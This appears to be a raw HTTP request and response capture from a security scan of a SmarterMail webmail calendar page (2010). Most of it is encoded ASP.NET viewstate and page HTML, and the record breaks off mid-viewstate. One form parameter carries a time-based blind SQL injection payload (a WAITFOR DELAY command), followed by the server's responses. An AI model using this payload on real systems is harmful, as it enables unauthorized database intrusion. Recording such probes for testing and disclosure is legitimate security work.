rYWJsZU5ldwNBbHRkAgoPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTE3JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDUgUE0CMTcCMTcRUmlnaHRDbGlja2FibGVOZXcAZAINDxQrAA0PFhwFDENsaWVudEV2ZW50cw8FhQFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5DYWxlbmRhckNsaWVudEV2ZW50cywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FggFAVIFDUNsZWFyQ2FsZW5kYXIFAVYFC1NlbGVjdE1vbnRoBQFDBQ1DbGVhckNhbGVuZGFyBQFKBQ1DbGVhckNhbGVuZGFyBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQUERm9jRAYAgBTk2y%2fNCAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFA0VWU2cFG1VzZUNvbHVtbkhlYWRlcnNBc1NlbGVjdG9yc2gFBE1heEQGAIAHReg9MQkFEk5hdmlnYXRpb25OZXh0VGV4dGUFBE1pbkQGAIBMBLe1qggFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwABBgCAFOTbL81IBRJOYXZpZ2F0aW9uUHJldlRleHRlBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAA8WBh4EU2tpbgUMU21hcnRlclRvb2xzHhNFbmFibGVFbWJlZGRlZFNraW5zaB4XRW5hYmxlQWpheFNraW5SZW5kZXJpbmdoZGQWBB4IQ3NzQ2xhc3MFC3JjTWFpblRhYmxlHgRfIVNCAgIWBB8MBQxyY090aGVyTW9udGgfDQICZBYEHwwFCnJjU2VsZWN0ZWQfDQICZBYEHwwFCnJjRGlzYWJsZWQfDQICFgQfDAUMcmNPdXRPZlJhbmdlHw0CAhYEHwwFCXJjV2Vla2VuZB8NAgIWBB8MBQdyY0hvdmVyHw0CAhYEHwwFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8NAgIWBB8MBQlyY1ZpZXdTZWwfDQICZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwVlZGQYBgUXY3RsMDAkVFBIJHRzVGFicyR0YWJBbGwPMs0LAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAA5NRU5VX0FsbEV2ZW50cwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAoLZAUaY3RsMDAkVFBIJHRzVGFicyR0YWJXZWVrbHkPMsYLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAdAV2Vla2x5AfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lECgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUUY3RsMDAkTVBIJGJ0bk5hdkxlZnQFFWN0bDAwJE1QSCRidG5OYXZSaWdodAUVY3RsMDAkTVBIJGJ0bkNhbFBvcHVwBRdjdGwwMCRNUEgkY2FsRGF0ZVBpY2tlcgUXY3RsMDAkTVBIJGNhbERhdGVQaWNrZXIFGWN0bDAwJFRQSCR0c1RhYnMkdGFiRGFpbHkPMsULAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAZARGFpbHkB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQKC2QFG2N0bDAwJFRQSCR0c1RhYnMkdGFiTW9udGhseQ8yxwsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBNb250aGx5AfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lECgtkBRxjdGwwMCRNUEgkY2FsQWxsJGdyZEFsbEFwcHRzDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZLwfQnwQUZfZixLmqDlJaLCPIvCW&ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceSelf_CB=%27;WAITFOR%20DELAY%20%270:0:25%27--&ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring_CB=on&ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterAllDay_CB=on&ctl00%24BrPH%24searchBar%24FilterBox=Search...&ctl00%24TPH%24tsTabs%24SelectedTab=ctl00_TPH_tsTabs_tabAll&ctl00_MPH_calDatePicker_SD=%5b%5b2010%2c10%2c2%5d%5d&ctl00_MPH_calDatePicker_AD=%5b%5b1980%2c1%2c1%5d%2c%5b2099%2c12%2c30%5d%2c%5b2010%2c10%2c2%5d%5d&ctl00%24MPH%24hfNewDate=1&ctl00%24MPH%24MenuID=1

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 13:12:10 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14088
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Calendar - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<link href="/WebResource.axd?d=zpx5ZPr_A4Xj1BaWRse8fIv63FDK5xX5aVnnyKmjTOWIp31Dymcy2GN7xJML4YReWQB5iODd6AcWlBiYBjbFSA2&amp;t=634214510020000000" type="text/css" rel="stylesheet" class="Telerik_stylesheet" /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmCalendar.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTE0MTU5OTM3NQ8WCB4IX19fVGl0bGUFC015IENhbGVuZGFyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeB19fc3RhdGUyjgUAAQAAAP////8BAAAAAAAAAAwCAAAAT1NNV2ViLCBWZXJzaW9uPTcuMi4zOTI1LjI0NTIxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWMzOWQzMzQ4NjU2ZTUxNmMMAwAAAFlSZW1vdGVJbnRlcmZhY2UsIFZlcnNpb249Ny4yLjM5MjUuMjQ1MTIsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YzM5ZDMzNDg2NTZlNTE2YwUBAAAAKlNNV2ViLkhlbHBlckNsYXNzZXMuQ2FsZW5kYXIuQ2FsZW5kYXJTdGF0ZQoAAAAER3VpZAxTZWFyY2hTdHJpbmcIQ2F0ZWdvcnkNU2hvd1JlY3VycmluZwpTaG93QWxsRGF5BE1vZGUORm9jdXNlZERhdGVVVEMRUmVzb3VyY2VPd25lclVzZXISUmVzb3VyY2VPd25lckVtYWlsA1NDRAEBAQAABAABAQQBASlTTVdlYi5IZWxwZXJDbGFzc2VzLkNhbGVuZGFyLkNhbGVuZGFyTW9kZQIAAAANPFNtYXJ0ZXJUb29scy5TbWFydGVyTWFpbC5SZW1vdGluZy5TaGFyaW5nLlNoYXJlQ29ubmVjdG9yRGF0YQMAAAACAAAABgQAAAAgNjhiNTM3MmIyMTAyNDZmNTgyZTA1ZmVjMmYxY2Y5NjYGBQAAAAAJBQAAAAEBBfr///8pU01XZWIuSGVscGVyQ2xhc3Nlcy5DYWxlbmRhci5DYWxlbmRhck1vZGUBAAAAB3ZhbHVlX18ACAIAAAAAAAAAYHZvp6wwzUgGBwAAAAVkdW1teQYIAAAAEWR1bW15QGhveXRsbGMuY29tCgsWAmYPZBYCAgEPZBYMAgMPZBYEAgEPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAQ9kFgRmDxYCHgdWaXNpYmxlaGQCAQ8WAh8EaGQCAg9kFgJmD2QWAmYPFgIfBGdkAgMPZBYCAgEPZBYCAgEPDxYCHgRUZXh0BQlTZWFyY2guLi5kZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8EaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh8FZWQCCQ9kFgICAw9kFgJmD2QWCAIBD2QWAmYPZBYIZg9kFgICAQ8PFgIeCEltYWdlVXJsBSsvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9NaXNjL05hdkxlZnQucG5nZGQCAQ9kFgICAQ8PFgIfBwUsL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvTWlzYy9OYXZSaWdodC5wbmdkZAICD2QWAgIBDw8WAh8FBRpTYXR1cmRheSwgT2N0b2JlciAwMiwgMjAxMGRkAgMPZBYCAgEPDxYCHwcFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmZGQCAw8WAh8EaGQCBw8PFgIfBGdkFgQCAQ8WAh8EaGQCAw8WAh4LXyFJdGVtQ291bnQCChYUAgEPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5SS9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTgmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEOCBBTQE4ATgRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAICD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUkvTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT05JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDkgQU0BOQE5EVJpZ2h0Q2xpY2thYmxlTmV3AGQCAw9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTAmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UFMTAgQU0CMTACMTARUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIED2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xMSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQUxMSBBTQIxMQIxMRFSaWdodENsaWNrYWJsZU5ldwBkAgUPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTEyJnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBTEyIFBNAjEyAjEyEVJpZ2h0Q2xpY2thYmxlTmV3A0FsdGQCBg9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTMmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEMSBQTQIxMwIxMxFSaWdodENsaWNrYWJsZU5ldwBkAgcPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTE0JnVzZXI9ZHVtbXkmbWFwcGVkPWZ